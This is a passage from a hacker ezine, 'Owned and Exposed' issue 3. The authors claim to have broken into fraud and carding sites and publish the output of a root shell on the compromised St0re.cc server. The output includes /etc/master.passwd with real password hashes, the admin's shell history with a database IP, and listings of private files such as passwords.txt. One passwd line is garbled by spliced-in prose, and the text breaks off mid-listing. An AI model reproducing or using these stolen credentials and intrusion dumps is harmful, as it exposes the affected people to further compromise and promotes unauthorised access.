[EZINE] Owned and Exposed - ISSUE no 3 |\___/| -=[ISSUE - NO 3]=- =) ^Y^ (= -=[OF]=- \ ^ / )=*=( ______________________________ __ ____________ _ / \ |.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | || _ | | | | | -__| _ | | . | | . || /| | | |\ ||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ | | | ______ |__//_// ___/ __ | | | .-----.--.--.-----.| |.-----.--\_).--| || | | | | -__|_ _| _ || || ||__ --| -__| _ || | | | |_____|__.__| __|| || ||_____|_____|_____|| |_/ \__________________________|__|___| || |___________________| |______| Featuring... .---. /\ Brought to you by .---. / . \ / \ your Happy Ninjas / . \ |\_/| | | | |\_/| | | | /| | b | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | c | / .-. | | / \ Intro | | k | | / \ The Happy Ninja Faker | | |\_. | St0re.cc | | | | |\_. | Swissfaking.net | |\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | | `---' | | | o | | `---' | | | |------------------' | n | | |----------------------' \ | .---. | c | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | | `---' |\_/| | | | /| | | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | g | / .-. | | / \ Undercover.su | | a | | / \ Secure-Host.in | | |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | |\| | /| | | n | |\| | /| | | `---' | | | | | `---' | | | |------------------' | | | |----------------------' \ | .---. | h | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | r | `---' |\_/| | | | /| | e | | | /| .-----------------------' | | | .---------------------------' | / .-. | | | / .-. | | / \ Zion-Network.net | | t | | / \ Some leftovers | | |\_. | Hackbase.cc | | o | | |\_. | Outro | |\| | /| | | | |\| | /| | | `---' | | | | | `---' | | | |------------------' | r | | |----------------------' \ | | m | \ | \ / | | \ / `---' | /\ | `---' :\______|/ \|______/: \__0day______0day__/ | /\ | || || || || || || || || | \/ | \____/ (____) First of all, here is the verification of the sha1 hash we published when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((========={ Intro }=========------- /' ' '()/~' '.(, | ,;( )|| | ~ Tonight's the night. And it's going to happen, ,;' \ /-(.;, ) again and again. It has to happen. ) / ) / // || We all want to welcome you to a brand new issue )_\ )_\ of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have gotten an increasingly important topic to media and the public. We want to line out our motivation in contrast to theirs. Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarily, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put up pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intent to contain it as much as possible. While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money. We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: It provides the security industry with the attention they need and hence new customers. But let's now look at why we are here today. "Money is the root of all evil" as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe because we are going to hunt down every single site that is left. We experience the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows well again how stubborn fraudsters are as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again. That being said we can just strongly advise you to spend your time on something worthwhile. It's not too late ... ,;~;, _/\ \ ) (\\ ()) /';;,, // | -------========={ St0re.cc }==========))))))))))))))=m( )_ __ | ,(.' '~/()' ' '\ Let's head to our first target. Fraud or scene ~ | ||( );, shops in general have not been our main concern. ( ,;.)-\ / ';, During our many break-ins in other fraud \ ( \ ( communities, we often were dazzled with glaring || \\ banners of underground markets where you could buy /_( /_( "fresh" CCs, PayPal accounts or socks5 proxies to stay "secure" while carding. So by now we got the hint that it might be worth finding out out how often and by whom these shops were really used. It's quite impressive how much money you can make by simply stealing PayPal accounts with a RAT and not using it for fraud but for selling it to scammers instead. That's why we clicked on the first banner we saw and concluded that it would be a noble action to root. We actually got pretty lucky since st0re.cc was not the only credit card store on that server. We spotted some others like the infamous El-Basar.biz (it was already shown in a German tv show), the rest is not worth to mention. Anyway this is what you get if you decide to buy credit cards in a webshop: You will get owned and exposed. Like always. # uname -a FreeBSD 6.4-RELEASE-p11 i386 i386 SMP-GENERIC # id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) # cat /etc/passwd # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin nukeuploads:*:1001:1001:User &:/home/nukeuploads:/bin/sh ayoga:*:1002:1002:User &:/home/ayoga:/sbin/nologin alg:*:1004:1004:User &:/home/alg:/bin/sh propiska:*:1005:1005:User &:/home/propiska:/sbin/nologin msk:*:1007:1007:User &:/home/msk:/sbin/nologin vestacomp:*:1006:1006:User &:/home/vestacomp:/sbin/nologin crank2010:*:1016:1016:User &:/home/crank2010:/sbin/nologin lordknight:*:1019:1019:User &:/home/lordknight:/bin/sh madrage:*:1003:1003:User &:/home/madrage:/bin/sh scenehack:*:1008:1008:User &:/home/scenehack:/sbin/nologin thefuelru:*:1009:1009:User &:/home/thefuelru:/sbin/nologin mr101:*:1021:1021:User &:/home/mr101:/bin/sh szenevz:*:1011:1011:User &:/home/szenevz:/sbin/nologin exchanger:*:1012:1012:User &:/home/exchanger:/bin/sh filip:*:1023:1023:User &:/home/filip:/sbin/nologin mmgen:*:1018:1018:User &:/home/mmgen:/sbin/nologin ganymedes:*:1024:1024:User &:/home/ganymedes:/sbin/nologin garf:*:1031:1031:User &:/home/garf:/sbin/nologin onlineschauen:*:1013:1013:User &:/home/onlineschauen:/bin/sh snetwork:*:1022:1022:User &:/home/snetwork:/sbin/nologin useresu:*:1010:1010:User &:/home/useresu:/sbin/nologin useresu1:*:1026:1026:User &:/home/useresu1:/sbin/nologin margosha:*:1020:1020:User &:/home/margosha:/sbin/nologin pavlrse:*:1027:1027:User &:/home/pavlrse:/sbin/nologin muraaat:*:1000:1000:User &:/home/muraaat:/sbin/nologin test4me:*:1014:1014:User &:/home/test4me:/bin/sh # cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin cyrus:*:60:60::1172782800:0:the cyrus mail server:/nonexistent:/usr/sbin/nologin nukeuploads:$1$hO28fqpU$OL/RovJhduUxEqR3kBawe.:1001:1001::0:0:User &:/home/nukeuploads:/bin/sh ayoga:$1$CNCuqfrs$p7QpuHI6jagkVUyvGO5MI.:1002:1002::0:0:User &:/home/ayoga:/sbin/nologin alg:$1$A07..akS$.TPW7o0ZCO25bB6AltS/Q.:1004:1004::0:0:User &:/home/alg:/bin/sh propiska:$1$Hgb0peXw$2wtRLXytI9Mmwbsxi/RAI.:1005:1005::0:0:User &:/home/propiska:/sbin/nologin msk:$1$yqxdalvS$IPYorMt8h.pMqc3V8mdED0:1007:1007::0:0:User &:/home/msk:/sbin/nologin vestacomp:$1$bL6RZJ2K$f7CTWRj.ps2Q9XuImy4sI1:1006:1006::0:0:User &:/home/vestacomp:/sbin/nologin crank2010:*:1016:1016::0:0:User &:/home/crank2010:/sbin/nologin lordknight:*:1019:1019::0:0:User &:/home/lordknight:/binbreak-ins in other fraud/sh madrage:*:1003:1003::0:0:User &:/home/madrage:/bin/sh scenehack:*:1008:1008::0:0:User &:/home/scenehack:/sbin/nologin thefuelru:*:1009:1009::0:0:User &:/home/thefuelru:/sbin/nologin mr101:*:1021:1021::0:0:User &:/home/mr101:/bin/sh szenevz:*:1011:1011::0:0:User &:/home/szenevz:/sbin/nologin exchanger:*:1012:1012::0:0:User &:/home/exchanger:/bin/sh filip:$1$asb5GyOE$OHPPapNFMf6zKA5FvrIpE/:1023:1023::0:0:User &:/home/filip:/sbin/nologin mmgen:$1$bnXQT0ng$obWjcBQFTBTKk83ElXfDt0:1018:1018::0:0:User &:/home/mmgen:/sbin/nologin ganymedes:$1$95EongK1$fFPWI1ePR8VKBIAQ/LwUu0:1024:1024::0:0:User &:/home/ganymedes:/sbin/nologin garf:$1$xzEPVuNH$26jps1eOPu2hNObvlcgkH0:1031:1031::0:0:User &:/home/garf:/sbin/nologin onlineschauen:$1$RihNUTco$hzbht5CwvI/h3X0cGe8T91:1013:1013::0:0:User &:/home/onlineschauen:/bin/sh snetwork:$1$y0T7yJX4$ER.mYpG3P21qlz3qgQWtN.:1022:1022::0:0:User &:/home/snetwork:/sbin/nologin useresu:$1$6J5xPk5F$sfpn5pAKTlf10hX3kSKkv.:1010:1010::0:0:User &:/home/useresu:/sbin/nologin useresu1:$1$gPsMDoWO$.Ve9Z8tEQLZrlF7MrP6ZH1:1026:1026::0:0:User &:/home/useresu1:/sbin/nologin margosha:*:1020:1020::0:0:User &:/home/margosha:/sbin/nologin pavlrse:$1$AKfcvELm$oImAlQWKKDaEd.dimM6wY/:1027:1027::0:0:User &:/home/pavlrse:/sbin/nologin muraaat:*:1000:1000::0:0:User &:/home/muraaat:/sbin/nologin test4me:$1$nNH.D3yA$2KQeYLwqG3TcFHOc9toFL0:1014:1014::0:0:User &:/home/test4me:/bin/sh # pwd /root # ls -la total 715748 drwxr-xr-x 4 root wheel 512 Sep 9 04:43 . drwx--x--x 18 root wheel 512 Apr 12 19:59 .. -rw------- 1 root wheel 10017 Sep 26 02:59 .bash_history -rw------- 1 root wheel 67 Sep 9 17:00 .cvspass -rw------- 1 root wheel 50 Feb 9 2011 .lesshst drwxr-xr-x 3 root wheel 512 Sep 26 02:57 .mc -rw------- 1 root wheel 1344 May 20 03:24 .mysql_history drwx------ 2 root wheel 512 Aug 14 19:22 .ssh -rwxr-xr-x 1 root wheel 241 Jul 21 00:11 addban.sh -rw-r--r-- 1 root wheel 601437 Apr 12 17:56 apache.log -rwxr-xr-x 1 root wheel 89 Mar 6 2010 apache_watchdog.php -rwxr-xr-x 1 root wheel 4184 Feb 2 2011 mydumpsplitter.sh -rwxr-xr-x 1 alg www 365607550 Feb 1 2011 zzz.sql # cat .bash_history apachectl restart exit tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log /usr/local/etc/rc.d/apache22 restart top -S tail -f /var/log/httpd/httpd_access.log /usr/local/etc/rc.d/apache22 restart /usr/local/etc/rc.d/apache22 restart /usr/local/etc/rc.d/apache22 restart cd /home/alg/ mc mysql -u root -p`cat /etc/my.passwd ` cd db_split/ mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql ls -la mcedit postindex.sql mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < adminlog.sql mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < attachment.sql top cd .. wget wget http://platon.sk/cvs/cvs.php/___checkout___/scripts/perl/mysql/mysqldump-convert.pl?rev=1.5&content-type=text/plain mysqldump-convert.pl mc ls mcedit mysqldump-convert.pl\?rev\=1.5 mc cat db_split/postindex.sql | ./mysqldump-convert.pl > postindex.sql mcedti postindex.sql mcedit postindex.sql mcedit mysqldump-convert.pl mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql exit mc /usr/local/etc/rc.d/apache22 restart top mc date exit mc cd /home/nukeuploads/nukeuploads.com/ chown nukeuploads:nukeuploads google4973efd9f5db5c16.html mc apachectl restart uptime top tail -n 1000 /var/log/httpd/httpd_access.log ps aux | grep nginx mc exit apachectl stop uptime uptime uptime uptime uptime top apachectl start exit tail -n 1000 /var/log/httpd/httpd_access.log exit top apachectl restart top tail -n 1000 /var/log/httpd/httpd_access.log tail -n 1000 /var/log/httpd/httpd_access.log exit apachectl restart top exit tail -f /var/log/httpd/httpd_access.log apachectl stop killall -9 httpd apachectl start tail -f /var/log/httpd/httpd_access.log ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http mc -d ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http top ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http ps ax|grep -c http top top uptime uptime uptime uptime uptime uptime top cd /home/kirbysho/ mc uptime uptime uptime mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf apachectl restart top mc mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf apachectl restart uptime uptime uptime uptime uptime uptime top tail -n 100 /var/log/httpd/httpd_access.log uptime uptime uptime uptime top exit apachectl restart exit tail -f /var/log/httpd/httpd_access.log killall -9 httpd apachectl restart top tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru mc -d date date date date date date date date killall -9 httpd apachectl start tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru tail -n 10000 /var/log/httpd/httpd_access.log | grep "russian-elite" > /root/apache.log mc killall -9 httpd apachectl start top tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru killall -9 httpd apachectl start tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru cat /var/log/httpd/httpd_access.log | grep kirby-shop.ru > /var/log/httpd_kirby.log cat /var/log/httpd/httpd_access.log cat/var/log/httpd_kirby.log cp /var/log/httpd_kirby.log cp /var/log/httpd_kirby.log /home/kirbysho/ ls /home/kirbysho/ exit tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log top top ps ax tail -f /var/log//httpd/httpd_access.log tail -f /var/log//httpd/httpd_access.log ps ax top ls -l ping ya.ru ping google.com exit mc tail -f /var/log/httpd/httpd_access.log mc mc mysql -unukeuploads_gla -p -h db.nukeuploads.com nukeuploads_gla mysql -unukeuploads_gla -p -h mysql -unukeuploads_gla -p -h mysql -unukeuploads_gla -p -h 92.241.164.71 nukeuploads_gla mc nslookup mc nslookup tail -n 1000 /var/log/httpd/httpd_access.log exit tail -n 1000 /var/log/httpd/httpd_access.log top exit tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log tail -n 1000 /var/log/httpd/httpd_access.log exit tail -n 100 /var/log/httpd/httpd_access.log tail -n 100 /var/log/httpd/httpd_access.log | grep russian | wc -l exit tail -f /var/log/httpd/httpd_access.log touch ~/addban.sh chmod +x ~/addban.sh mcedit ~/addban.sh tail -n 100 /world/sec1005/var/log/httpd/httpd_access.log | grep 'swissfaking.net' | awk '{print }' | sort | uniq -c | sort -n | awk '{if ($1>3) print $2}' /usr/local/etc/rc.d/apache22 restart /usr/local/etc/rc.d/apache22 restart tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log /usr/local/etc/rc.d/nginx status tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log tail -f /var/log/httpd/httpd_access.log tcpdump -nn host 187.160.244.66 tcpdump -nni bge0 host 187.160.244.66 tcpdump -nni bge0 host 187.160.244.66 sort /var/log/httpd/httpd_load.log | awk '{print $1}' | uniq -c mc mc -d php -V php -v mysql -v mysql -V top mc ls -la cd /home/margosha/ ls -la pwd mc killall -9 mc ls -la cd forum.la2amadis.ru/ ls -la cd .. ls -la chown -cRv margosha:www ./* chown -cRv margosha:www ./* chown -cR margosha:www ./* chown -R margosha:www ./* ls -la cd forum.la2amadis.ru/ ls -la cd .. ls -la cd la2amadis.ru/ ls -la mc ps ax w ps axu ps axu tail -f /var/log/httpd/httpd_access.log exit ps wauxf cat /proc/22623/cmdline kill -9 22623 ps wauxf df -h cd /home/toco123/ ls -la cd 00/ ls -la mc killall -9 mc ps wauxf df -h ls /tmp ls -la ls -la /tmp/ ps wauxf df -h w cd / ls -la cat /etc/fsta ps wauxf kill -9 22623 cd /tmp/ ls -la rm a.* ls -la tail -f /var/log/httpd/httpd_access.log w ps wauxf ifconfig cd /home/ ls -la mc cd /home/margosha/ tar czfv backup.tgz forum.la2amadis.ru la2amadis.ru mc chown margosha:www backup.tgz mc php -v cd /usr/ports/mail/php-imap cd /usr/ports/ cd ./mail ls |grep imap cd php5-imap make install clean cd /usr/local/etc/ ls mc mc cd /usr/ports/mail/php52-imap make install clean cd /usr/ports/mail/php5-imap make install clean portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 cd /usr/ports/mail/php52-imap portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 cd /usr/ports/ports-mgmt/portdowngrade make install clean make install clean cd /usr/ports/mail/php5-imap portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 cd /usr/ports/mail/php5-imap portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 php -m whereis portdowngrade cd /usr/ports/ports-mgmt/portdowngrade make install clean cd /usr/ports/devel/popt make install clean cd /usr/ports/devel/libtool22 make install clean cd - make install clean uname -a php -v cd /usr/ports/lang/php52-extensions/ make config make cd ../php5-extensions/ make config make php -v portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 touch /root/.cvspass portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 php -v portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 -o anoncvs portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -o=anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 server_args = -f --allow-root=/test pserver cat /etc/inetd.conf cat /etc/inetd.conf | grep allow portdowngrade -s :pserver:anoncvs@cvsup13.tw.freebsd.org:/home/ncvs lang/php5 portdowngrade -s :pserver:cvsup13.tw.freebsd.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@cvsup13.fr.freebsd.org:/home/ncvs lang/php5 mc php -v | grep imap php -m | grep imap portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs2.FreeBSD.org:/home/ncvs lang/php5 php -v portdowngrade lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncv lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -r -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :login:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 portdowngrade -s ":pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs" lang/php5 portdowngrade -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 cd /usr/ports/mail/php5-imap/ make config make cd .. cd .. mc cd distfiles/ fetch http://downloads.php.net/ilia/php-5.2.5.tar.bz2 cd .. cd mail/php5-imap/ make make install php -m php -m | grep imap ls /var/db/pkg/| grep extre ls /var/db/pkg/| grep exte ls mc # cd /home/mmgen total 44 drwxr-x--- 7 mmgen www 512 Jun 11 13:18 . drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. drwxrwx--- 5 mmgen www 512 Jun 11 15:22 dodo.st0re.cc drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 st0re.cc drwxrwx--- 3 mmgen www 512 Jan 26 2011 st0re.mmgen.st0re drwxrwx--- 4 mmgen www 512 Dec 2 2010 st0re.morgen.w2c.ru drwxrwx--- 2 mmgen www 10240 Oct 1 16:32 temp # cd dodo.st0re.cc # ls -la total 96 drwxrwx--- 5 mmgen www 512 Jun 11 15:22 . drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 css drwxr-xr-x 4 mmgen www 2048 Jun 11 15:23 images -rw-r--r-- 1 mmgen www 38106 Jun 11 15:23 index.html drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 js # cd .. # cd st0re.mmgen.st0re # ls -la total 16 drwxrwx--- 3 mmgen www 512 Jan 26 2011 . drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .. drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 Neues Verzeichnis -rw-r--r-- 1 mmgen www 1034 Dec 2 2010 index.html # cd "Neues Verzeichnis" # ls -la total 237856 drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 . drwxrwx--- 3 mmgen www 512 Jan 26 2011 .. -rw-r--r-- 1 mmgen www 12326 Jan 26 2011 2.pl -rw-r--r-- 1 mmgen www 3790 Jan 26 2011 2.png -rw-r--r-- 1 mmgen www 697711 Jan 26 2011 22.png -rw-r--r-- 1 mmgen www 164 Jan 26 2011 280539654158.kwm -rw-r--r-- 1 mmgen www 1608 Jan 26 2011 280539654158.pwm -rw-r--r-- 1 mmgen www 40882 Jan 26 2011 4.jpg -rw-r--r-- 1 mmgen www 40505 Jan 26 2011 Banner4.jpg -rw-r--r-- 1 mmgen www 1280 Jan 26 2011 Command Prompt.lnk -rw-r--r-- 1 mmgen www 231 Jan 26 2011 Data.txt -rw-r--r-- 1 mmgen www 900 Jan 26 2011 Daten.rtf -rw-r--r-- 1 mmgen www 661429 Jan 26 2011 Enterpage.png -rw-r--r-- 1 mmgen www 126738 Jan 26 2011 Enterpage_for_gamekings_eu_by_Frizzl3.jpg -rw-r--r-- 1 mmgen www 1616155 Jan 26 2011 FILE0009.rar -rw-r--r-- 1 mmgen www 952 Jan 26 2011 Fake Webcam (No Preview Mode).lnk -rw-r--r-- 1 mmgen www 942 Jan 26 2011 Fake Webcam.lnk -rw-r--r-- 1 mmgen www 1950 Jan 26 2011 FileZilla Client.lnk -rw-r--r-- 1 mmgen www 1192 Jan 26 2011 Foxit Reader.lnk -rw-r--r-- 1 mmgen www 10374720 Jan 26 2011 MasterCard-Abrechnung.psd -rw-r--r-- 1 mmgen www 1889 Jan 26 2011 Mozilla Firefox.lnk -rw-r--r-- 1 mmgen www 22207 Jan 26 2011 Neues Textdokument.txt -rw-r--r-- 1 mmgen www 137 Jan 26 2011 PSN2.txt drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Pack_Pixel_Arrows_01 drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Packstation -rw-r--r-- 1 mmgen www 38207488 Jan 26 2011 PhotoshopCS4Portable.rar -rw-r--r-- 1 mmgen www 1139 Jan 26 2011 SQLRIP.lnk -rw-r--r-- 1 mmgen www 1884 Jan 26 2011 SendBlaster.lnk -rw-r--r-- 1 mmgen www 2505 Jan 26 2011 Skype.lnk -rw-r--r-- 1 mmgen www 318050 Jan 26 2011 St0re.jpg -rw-r--r-- 1 mmgen www 4574766 Jan 26 2011 St0re.psd -rw-r--r-- 1 mmgen www 679964 Jan 26 2011 St0re2.jpg -rw-r--r-- 1 mmgen www 24560317 Jan 26 2011 St0reinfo - Shopdesign2.psd -rw-r--r-- 1 mmgen www 1124 Jan 26 2011 TeamViewer 6.lnk -rw-r--r-- 1 mmgen www 917 Jan 26 2011 WebMoney Keeper Classic 3.9.3.1.lnk -rw-r--r-- 1 mmgen www 40467 Jan 26 2011 Werbung.png -rw-r--r-- 1 mmgen www 3821 Jan 26 2011 btn2.png -rw-r--r-- 1 mmgen www 68286 Jan 26 2011 btn2.psd -rw-r--r-- 1 mmgen www 748437 Jan 26 2011 exported data.txt -rw-r--r-- 1 mmgen www 1179 Jan 26 2011 head.gif -rw-r--r-- 1 mmgen www 1789314 Jan 26 2011 head.psd -rw-r--r-- 1 mmgen www 2084608 Jan 26 2011 hinten.png -rw-r--r-- 1 mmgen www 791 Jan 26 2011 new 2.txt -rw-r--r-- 1 mmgen www 1133 Jan 26 2011 new 5.txt -rw-r--r-- 1 mmgen www 528 Jan 26 2011 new 9.txt -rw-r--r-- 1 mmgen www 3318 Jan 26 2011 passwords.txt -rw-r--r-- 1 mmgen www 145044 Jan 26 2011 pp.rar -rw-r--r-- 1 mmgen www 31694808 Jan 26 2011 setup.exe -rw-r--r-- 1 